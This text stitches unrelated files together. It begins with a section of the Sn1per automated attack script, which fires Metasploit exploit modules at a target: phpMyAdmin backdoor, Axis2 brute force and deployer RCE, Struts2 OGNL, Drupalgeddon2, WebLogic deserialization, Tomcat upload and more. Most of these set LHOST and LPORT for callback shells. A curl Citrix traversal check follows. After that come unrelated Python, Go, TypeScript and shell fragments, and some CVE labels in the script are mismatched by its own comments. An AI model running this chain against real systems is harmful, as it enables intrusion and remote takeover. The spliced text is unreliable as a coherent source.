msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
# Axis2 admin login brute force using the configured password file.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
# Axis2 authenticated service deployer RCE (fingerprint check disabled).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
# Joomla com_fields SQL injection RCE (CVE-2017-8917).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
# WordPress REST API content injection (banner says CVE-2017-5612; the REST
# API issue is commonly tracked as CVE-2017-1001000 — NOTE(review): confirm).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
# Oracle WebLogic WLS-WSAT deserialization RCE (CVE-2017-10271).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
# Apache Struts 2 Jakarta Content-Type OGNL injection (CVE-2017-5638).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
# Struts 2 REST XStream deserialization RCE (banner labels may be swapped with
# the next section — NOTE(review): rest_xstream is CVE-2017-9805).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
# Struts 2 Showcase code-exec (module matches CVE-2017-9791).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
# Tomcat JSP upload bypass RCE (CVE-2017-12617).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
# Struts 2 namespace redirect OGNL injection (CVE-2018-11776).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
# Cisco ASA path traversal scanner (CVE-2018-0296).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
# Drupalgeddon2 RCE (CVE-2018-7600), tried at / and /drupal/.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
# Oracle WebLogic T3 deserialization RCE (CVE-2018-2628).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
# osCommerce installer unauthenticated code exec (banner reuses the WebLogic
# CVE id — NOTE(review): this osCommerce issue is not CVE-2018-2628).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
# Drupal RESTful Web Services unserialize RCE (CVE-2019-6340), / and /drupal/.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
# Java RMI endpoint scanner (note: this one escapes its inner quotes properly).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
# Pulse Secure VPN arbitrary file disclosure.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
# Citrix ADC/Gateway path traversal check (CVE-2019-19781): a 403 on the
# traversed /vpns/ path indicates the appliance is unpatched.
# BUG FIX: the grep pattern previously contained a typographic apostrophe
# ("don’t"), which never matches Apache's straight-quote error body, so
# vulnerable hosts were always reported as MITIGATED. Match a substring that
# avoids the apostrophe entirely.
# NOTE(review): this check always uses https and ignores $PORT — confirm
# that is intended for this scan mode.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
# Optional Slack notification marking the end of the scan.
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
|
with open('../cities.txt') as f:
my_list = []
|
<gh_stars>0
package workflow
import (
"context"
"fmt"
"github.com/go-gorp/gorp"
"github.com/ovh/cds/engine/api/application"
"github.com/ovh/cds/engine/api/cache"
"github.com/ovh/cds/engine/api/environment"
"github.com/ovh/cds/engine/api/observability"
"github.com/ovh/cds/sdk"
"github.com/ovh/cds/sdk/exportentities"
v2 "github.com/ovh/cds/sdk/exportentities/v2"
)
// Export loads the workflow identified by name in the given project and
// converts it to its exportable representation.
func Export(ctx context.Context, db gorp.SqlExecutor, cache cache.Store, proj sdk.Project, name string, opts ...v2.ExportOptions) (exportentities.Workflow, error) {
	ctx, end := observability.Span(ctx, "workflow.Export")
	defer end()

	loaded, err := Load(ctx, db, cache, proj, name, LoadOptions{})
	if err != nil {
		return v2.Workflow{}, sdk.WrapError(err, "cannot load workflow %s", name)
	}

	// Workflows managed as-code keep their hooks in the repository itself,
	// so the single repository webhook is skipped during export.
	if loaded.FromRepository != "" {
		opts = append(opts, v2.WorkflowSkipIfOnlyOneRepoWebhook)
	}

	exported, err := exportentities.NewWorkflow(ctx, *loaded, opts...)
	if err != nil {
		return v2.Workflow{}, sdk.WrapError(err, "unable to export workflow")
	}

	return exported, nil
}
// Pull loads a workflow together with all its dependencies (template
// instance, applications, environments and pipelines) and returns them as
// exportable components.
// NOTE(review): the previous comment mentioned writing a tar buffer to a
// writer, but this function takes no writer and only returns the components —
// presumably the caller performs the tar serialization.
func Pull(ctx context.Context, db gorp.SqlExecutor, cache cache.Store, proj sdk.Project, name string,
	encryptFunc sdk.EncryptFunc, opts ...v2.ExportOptions) (exportentities.WorkflowComponents, error) {
	ctx, end := observability.Span(ctx, "workflow.Pull")
	defer end()

	var wp exportentities.WorkflowComponents

	wf, err := Load(ctx, db, cache, proj, name, LoadOptions{
		DeepPipeline: true,
		WithTemplate: true,
	})
	if err != nil {
		return wp, sdk.WrapError(err, "cannot load workflow %s", name)
	}

	// Workflows generated from a template are exported as a template-instance
	// reference only; the full component export below is skipped.
	if wf.TemplateInstance != nil {
		return exportentities.WorkflowComponents{
			Template: exportentities.TemplateInstance{
				Name:       wf.Name,
				From:       fmt.Sprintf("%s@%d", wf.TemplateInstance.Template.Path(), wf.TemplateInstance.WorkflowTemplateVersion),
				Parameters: wf.TemplateInstance.Request.Parameters,
			},
		}, nil
	}

	// Reload each application to retrieve decrypted variables and private keys.
	for i := range wf.Applications {
		app := wf.Applications[i]
		vars, err := application.LoadAllVariablesWithDecrytion(db, app.ID)
		if err != nil {
			return wp, sdk.WrapError(err, "cannot load application variables %s", app.Name)
		}
		app.Variables = vars

		keys, err := application.LoadAllKeysWithPrivateContent(db, app.ID)
		if err != nil {
			return wp, sdk.WrapError(err, "cannot load application keys %s", app.Name)
		}
		app.Keys = keys

		wf.Applications[i] = app
	}

	// Reload each environment to retrieve decrypted variables and private keys.
	for i := range wf.Environments {
		env := wf.Environments[i]
		vars, err := environment.LoadAllVariablesWithDecrytion(db, env.ID)
		if err != nil {
			return wp, sdk.WrapError(err, "cannot load environment variables %s", env.Name)
		}
		env.Variables = vars

		keys, err := environment.LoadAllKeysWithPrivateContent(db, env.ID)
		if err != nil {
			return wp, sdk.WrapError(err, "cannot load environment keys %s", env.Name)
		}
		env.Keys = keys

		wf.Environments[i] = env
	}

	// If the repository is "as-code", hide the single repository webhook.
	if wf.FromRepository != "" {
		opts = append(opts, v2.WorkflowSkipIfOnlyOneRepoWebhook)
	}

	wp.Workflow, err = exportentities.NewWorkflow(ctx, *wf, opts...)
	if err != nil {
		return wp, sdk.WrapError(err, "unable to export workflow")
	}

	// Only dependencies managed in the same repository as the workflow itself
	// are included in the pulled components.
	for _, a := range wf.Applications {
		if a.FromRepository != wf.FromRepository { // don't export if coming from an other repository
			continue
		}
		app, err := application.ExportApplication(db, a, encryptFunc)
		if err != nil {
			return wp, sdk.WrapError(err, "unable to export app %s", a.Name)
		}
		wp.Applications = append(wp.Applications, app)
	}

	for _, e := range wf.Environments {
		if e.FromRepository != wf.FromRepository { // don't export if coming from an other repository
			continue
		}
		env, err := environment.ExportEnvironment(db, e, encryptFunc)
		if err != nil {
			return wp, sdk.WrapError(err, "unable to export env %s", e.Name)
		}
		wp.Environments = append(wp.Environments, env)
	}

	for _, p := range wf.Pipelines {
		if p.FromRepository != wf.FromRepository { // don't export if coming from an other repository
			continue
		}
		wp.Pipelines = append(wp.Pipelines, exportentities.NewPipelineV1(p))
	}

	return wp, nil
}
|
<gh_stars>10-100
/**
* Copyright (C) Oranda - All Rights Reserved (January 2021 - January 2021)
*/
import { HaliaCore, HaliaPlugin, OptionalDependencies, OptionalDependenciesPatch } from "../src";
import { haliaCoreAPI, HaliaStack } from "../src/halia";
import { expect } from "chai";
// Mocha/Chai tests for Halia optional-dependency injection.
describe("Extensions", () => {
  // The shared core import register starts empty before any extension is built.
  it("should have no registered elements", async () => {
    expect(haliaCoreAPI.importRegister.size()).equals(0);
  });

  // Without the OptionalDependencies extension, an optional dependency listed
  // by a plugin is not injected into its install callback (arrives undefined).
  it("should not inject optional dependencies", async () => {
    // Initialize the Stack
    const stack = new HaliaStack<HaliaPlugin & OptionalDependenciesPatch>();
    stack.register({ name: "P1", install: () => "P1", id: "p1" });
    stack.register({ name: "P2", install: ({ p1 }) => expect(p1).equals(undefined), id: "p2", optionalDependencies: ["p1"] });

    // Build the Stack
    await stack.build();
  });

  // NOTE(review): test order matters — this test installs OptionalDependencies
  // into the shared haliaCoreAPI, which the following test relies on.
  it("should build with optional dependencies", async () => {
    // Initialize the Stack
    const coreStack = new HaliaStack();

    // Register Elements
    coreStack.register(HaliaCore);
    coreStack.register(OptionalDependencies);

    // Build the Stack
    await coreStack.build();
    expect(haliaCoreAPI.importRegister.size()).equals(1);
  });

  // With the extension installed (previous test), the optional dependency's
  // install result is now injected into the dependent plugin.
  it("should inject optional dependencies", async () => {
    // Initialize the Stack
    const stack = new HaliaStack<HaliaPlugin & OptionalDependenciesPatch>();
    stack.register({ name: "P1", install: () => "P1", id: "p1" });
    stack.register({ name: "P2", install: ({ p1 }) => expect(p1).equals("P1"), id: "p2", optionalDependencies: ["p1"] });

    // Build the Stack
    await stack.build();
  });
});
|
#!/bin/sh
#
# Evaluate a trained checkpoint on a dataset.
#
# Usage: <script> <GPU_ID> <DATASET> <ARCH> <CKPT>

# Validate the argument count before reading any positional parameter
# (the original assigned $1..$4 first, then checked).
if [ $# -ne 4 ]
then
  echo "Arguments error: <GPU_ID> <DATASET> <ARCH> <CKPT>"
  exit 1
fi

GPU=$1
DATA=$2
ARCH=$3
CKPT=$4

# Run train.py in evaluation-only mode against the given checkpoint.
# Expansions are quoted so checkpoint/dataset paths containing spaces work.
python train.py \
  --eval \
  --resume "$CKPT" \
  --sgpu "$GPU" \
  -d "$DATA" \
  -a "$ARCH" \
  -n 64 \
  -m 0 \
  --name test
|
#!/bin/bash
# Copyright 2014 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.

# For testing Native Client on builders or locally.
# Builds a test file system and embeds it into package syscall
# in every generated binary.
#
# Assumes that sel_ldr binaries and go_nacl_$GOARCH_exec scripts are in $PATH;
# see ../misc/nacl/README.

# Abort on the first failing command.
set -e
# Disable core dumps for the test runs.
ulimit -c 0

# guess GOARCH if not set
naclGOARCH=$GOARCH
if [ -z "$naclGOARCH" ]; then
case "$(uname -m)" in
x86_64)
naclGOARCH=amd64p32
;;
armv7l) # NativeClient on ARM only supports ARMv7A.
naclGOARCH=arm
;;
i?86)
naclGOARCH=386
;;
esac
fi

# Check GOARCH: make sure the matching sel_ldr loader binary is on $PATH.
case "$naclGOARCH" in
amd64p32)
if ! which sel_ldr_x86_64 >/dev/null; then
echo 'cannot find sel_ldr_x86_64' 1>&2
exit 1
fi
;;
386)
if ! which sel_ldr_x86_32 >/dev/null; then
